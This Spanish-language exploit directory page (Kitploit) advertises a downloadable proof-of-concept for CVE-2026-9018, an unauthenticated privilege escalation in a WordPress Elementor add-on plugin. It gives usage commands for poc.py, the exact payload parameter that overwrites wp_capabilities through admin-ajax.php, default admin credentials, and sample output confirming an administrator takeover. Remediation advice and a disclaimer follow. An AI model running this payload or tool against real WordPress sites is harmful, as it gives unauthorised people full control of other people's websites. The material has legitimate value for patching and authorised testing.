Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-9018 — Escalada de privilegios no autenticada CVE-2026-9018: Easy Elements for Elementor | Kitploit
Herramientas/GitHubGitHub/xxconi/cve-2026-9018
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubxxconi/cve-2026-9018

CVE-2026-9018

Escalada de privilegios no autenticada CVE-2026-9018: Easy Elements for Elementor

Ver Repositorio
1hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-9018

CVE-2026-9018 — Easy Elements for Elementor ≤ 1.4.5 | Elevación de Privilegios No Autenticada

CVE CVSS CWE Auth Python

Investigación por: Atomic Edge Severidad: Alta | CVSS: 8.8 | Autenticación requerida: Ninguna


Descripción general

Existe una vulnerabilidad de elevación de privilegios no autenticada en el plugin de WordPress Easy Elements for Elementor – Addons & Website Templates (versiones ≤ 1.4.5). La función easyel_handle_register(), expuesta a través del manejador AJAX wp_ajax_nopriv_eel_register, pasa los valores POST de custom_meta controlados por el atacante directamente a update_user_meta() sin ninguna lista blanca de claves. Esto permite a un atacante no autenticado sobrescribir la clave de metadatos wp_capabilities y crear una cuenta con nivel de administrador.


Requisitos previos

Antes de la explotación, deben cumplirse las siguientes condiciones en el sitio objetivo:

  • ✅ El registro de usuarios de WordPress está habilitado (Ajustes → General → Cualquiera puede registrarse)
  • ✅ Una página con el widget Login/Register del plugin es de acceso público
  • ✅ El widget expone el valor easy_elements_nonce en el DOM de la página.

Requisitos

root@kitploit:~
pip install requests

Uso

root@kitploit:~
# Basic — nonce fetched from homepage
python3 poc.py -u https://target.com

# Custom credentials
python3 poc.py -u https://target.com -U hacker -e [email protected] -p P@ssw0rd!

# Widget is on /login/ page
python3 poc.py -u https://target.com --nonce-page /login/

# Skip SSL verification
python3 poc.py -u https://target.com --no-verify

# Skip post-exploit login check
python3 poc.py -u https://target.com --skip-verify-login

Argumentos

Ejemplo de salida

root@kitploit:~
[*] Fetching nonce from: https://target.com/login/
[+] Nonce found: a1b2c3d4e5

[*] Sending privilege escalation payload to: https://target.com/wp-admin/admin-ajax.php
[*] Username : atomic_admin
[*] Email    : [email protected]
[*] Role     : administrator (via wp_capabilities override)

[+] HTTP Status : 200
[✓] Privilege escalation payload accepted!
[✓] Admin login CONFIRMED!

    ┌─────────────────────────────────────────┐
    │  WP Admin  : https://target.com/wp-admin/
    │  Username  : atomic_admin
    │  Password  : Atomic@Edge2026!
    └─────────────────────────────────────────┘

Detalles técnicos

El exploit sigue un proceso de dos pasos:

Paso 1 — Obtención del nonce El widget Login/Register de Elementor del plugin renderiza un campo oculto easy_elements_nonce en el HTML de la página. Este nonce es accesible públicamente para cualquier visitante no autenticado y se extrae mediante una expresión regular del código fuente de la página.

Paso 2 — Registro malicioso Se envía una petición POST a /wp-admin/admin-ajax.php con action=eel_register. El array custom_meta se construye para incluir:

root@kitploit:~
custom_meta[wp_capabilities][administrator] = 1

Debido a que easyel_handle_register() pasa todas las claves de custom_meta directamente a update_user_meta() sin una lista blanca, los metadatos de usuario wp_capabilities se sobrescriben después del registro, otorgando al nuevo usuario privilegios completos de administrador.


Remediación

Los desarrolladores deben aplicar las siguientes correcciones a easyel_handle_register():

  1. Implementar una lista blanca estricta de claves custom_meta permitidas (p. ej., first_name, last_name, phone)
  2. Bloquear explícitamente las claves sensibles: wp_capabilities, wp_user_level, session_tokens
  3. Evitar procesar cualquier metadato proporcionado por el usuario después de wp_insert_user() si no es necesario
  4. La sanitización de entradas por sí sola es insuficiente: una lista blanca es obligatoria

→ Actualice Easy Elements for Elementor a la versión 1.4.6 o posterior inmediatamente.


Aviso legal

Este repositorio está destinado únicamente a investigación de seguridad autorizada y fines educativos. No utilice esta herramienta contra ningún sistema sin permiso explícito por escrito del propietario del sistema. El uso no autorizado puede violar la CFAA (EE. UU.), el Código Penal s.342.1 (Canadá), la Directiva NIS2 de la UE y otras leyes aplicables. Los autores no aceptan ninguna responsabilidad por el mal uso o los daños derivados de este código.

Descargar herramienta
PropiedadDetalle
PluginEasy Elements for Elementor – Addons & Website Templates (easy-elements)
Afectadas≤ 1.4.5
Corregida en1.4.6+
VectorRed / No autenticado
CWECWE-269: Gestión inadecuada de privilegios
Acción AJAXeel_register (nopriv)
FlagDescripciónPor defecto
-u, --urlURL del sitio WordPress objetivo(obligatorio)
-U, --usernameNombre de usuario para la nueva cuenta de administradoratomic_admin
-e, --emailCorreo electrónico para la nueva cuenta de administrador[email protected]
-p, --passwordContraseña para la nueva cuenta de administradorAtomic@Edge2026!
-np, --nonce-pageRuta de la página que contiene el widget Login/Register/
--no-verifyDeshabilitar la verificación del certificado SSLfalse
--skip-verify-loginOmitir la verificación de inicio de sesión en el panel de WP tras el exploitfalse